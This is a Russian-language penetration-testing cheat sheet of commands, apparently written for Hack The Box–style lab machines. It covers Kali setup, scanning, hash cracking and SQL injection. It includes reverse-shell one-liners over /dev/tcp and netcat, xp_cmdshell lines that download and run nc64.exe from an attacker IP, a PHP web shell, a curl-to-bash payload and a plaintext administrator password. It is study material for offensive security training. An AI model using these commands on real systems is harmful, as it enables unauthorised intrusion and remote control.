Инструменты пентестинга и полезные команды

GTFOBins — список Unix-бинарников, которые можно использовать для обхода локальных ограничений безопасности в неправильно настроенных системах.

Kali OS

Выбор сетевых репозиториев

По умолчанию:

echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" | sudo tee /etc/apt/sources.list

Более стабильная версия:

echo "deb http://http.kali.org/kali kali-last-snapshot main contrib non-free" | sudo tee /etc/apt/sources.list

Установить все инструменты:

sudo apt install -y kali-linux-large

Установить GUI:

sudo apt install -y kali-win-kex

Документация GUI. Запуск GUI, для выхода из полноэкранного режима нажмите F8:

kex --win -s

Wappalyzer — расширение браузера для просмотра технологий, используемых на сайтах.

OpenVPN

sudo openvpn --config vpn.ovpn --daemon

Сетевой интерфейс можно проверить, выполнив команду ifconfig в терминале.

Отключение

sudo ifconfig tun1 down

Поиск веб-каталогов на сайте: dirsearch -u http://october.metaltech.stf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt

Responder

sudo responder -I tun0

John the ripper

zip2john backup.zip > hashes
john -w=/usr/share/wordlists/rockyou.txt hash.txt

Определение возможных хешей

hashid 2cb42f8734ea607eefed3b70af13bbd3

Взлом хеша

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

Пентестинг MSSQL

Шпаргалка по SQL-инъекциям MSSQL

Impacket mssql клиент

impacket-mssqlclient ARCHETYPE/[email protected] -windows-auth
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.17.81/nc64.exe -outfile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.17.81 443"

SQL map

sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo'
sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo' --os-shell

winPEAS (повышение привилегий Windows)

linPEAS (повышение привилегий Linux)

Evil Win Remote

evil-winrm -i 10.129.233.177 -u administrator -p badminton

Nmap

sudo nmap -sV 192.168.1.1

sudo nmap -sV -sC 192.168.1.1

sudo nmap -p- --min-rate 5000 -sV 192.168.1.1

Gobuster

go install github.com/OJ/gobuster/v3@latest
git clone https://github.com/danielmiessler/SecLists.git
gobuster dir --url http://10.129.236.130/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir --url http://10.129.119.70/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb

MySQL

mysql -h 10.129.132.32 -u root
SHOW databases; : Выводит базы данных, к которым есть доступ.
USE {database_name}; : Переключиться на базу данных с именем {database_name}.
SHOW tables; : Выводит доступные таблицы в текущей базе данных.
SELECT * FROM {table_name}; : Выводит все данные из таблицы {table_name}.

SMB

smbclient -N -L \\\\{TARGET_IP}\\
-N : Без пароля
-L : Эта опция позволяет посмотреть, какие сервисы доступны на сервере

Полностью интерактивные оболочки

Простой PHP Shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Reverse Shell

printf '#!/bin/bash\nbash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1' > shell.sh

Или

bash -c "bash -i >& /dev/tcp/{your_IP}/1337 0>&1"

Запуск ncat listener

nc -nvlp 1337

Запуск веб-сервера

python3 -m http.server 8000

Пример запуска

http://thetoppers.htb/shell.php?cmd=curl%20%3CYOUR_IP_ADDRESS%3E:8000/shell.sh|bash

Функциональная оболочка

python3 -c 'import pty;pty.spawn("/bin/bash")'

Улучшение оболочки

script /dev/null -c bash

Burp Suite

Metasploit

sqlmap